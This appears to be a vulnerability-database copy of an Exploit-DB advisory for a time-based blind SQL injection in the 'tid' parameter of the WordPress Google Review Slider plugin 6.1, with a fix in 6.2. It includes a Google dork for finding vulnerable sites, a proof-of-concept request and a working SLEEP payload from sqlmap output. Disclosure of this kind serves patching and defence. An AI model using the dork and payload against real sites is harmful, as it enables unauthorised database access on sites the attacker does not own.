Wordpress Plugin Google Review Slider 6.1 - 'tid' SQL Injection

vendor:

Wordpress Plugin Google Review Slider

by:

Princy Edward

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Wordpress Plugin Google Review Slider

Affected Version From: 6.1

Affected Version To: 6.1

Patch Exists: YES

Related CWE: N/A

CPE: a:wordpress:wordpress_plugin:wp-google-places-review-slider

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Apache/2.2.24 (CentOS)

2019

WordPress Plugin Google Review Slider 6.1 – ‘tid’ SQL Injection

A SQL injection vulnerability was discovered in Wordpress Plugin Google Review Slider 6.1. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to execute arbitrary SQL commands on the underlying database.

Mitigation:

Upgrade to version 6.2 of the Wordpress Plugin Google Review Slider.

Source

Exploit-DB raw data:

# Exploit Title: Wordpress Plugin Google Review Slider 6.1 - 'tid' SQL Injection
# Google Dork: inurl:"/wp-content/plugins/wp-google-places-review-slider/"
# Date: 2019-07-02
# Exploit Author: Princy Edward
# Exploit Author Blog : https://prinyedward.blogspot.com/
# Vendor Homepage: https://wordpress.org/plugins/wp-google-places-review-slider/
# Version: 6.1
# Tested on: Apache/2.2.24 (CentOS)
# CVE : 

#POC :

GET/wp-admin/admin.php?page=wp_google-templates_posts&tid=1&_wpnonce=***
&taction=edit HTTP/1.1

#SQLMAP Result :
sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests:
---
Parameter: tid (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=wp_google-templates_posts&tid=1 AND (SELECT 5357 FROM
(SELECT(SLEEP(5)))kHQz)&_wpnonce=***&taction=edit

# Changeset:
# Issue fixed in version 6.2
# https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2180197%40wp-google-places-review-slider&old=2163061%40wp-google-places-review-slider&sfp_email=&sfph_mail=

Cheers!
PrincyEdward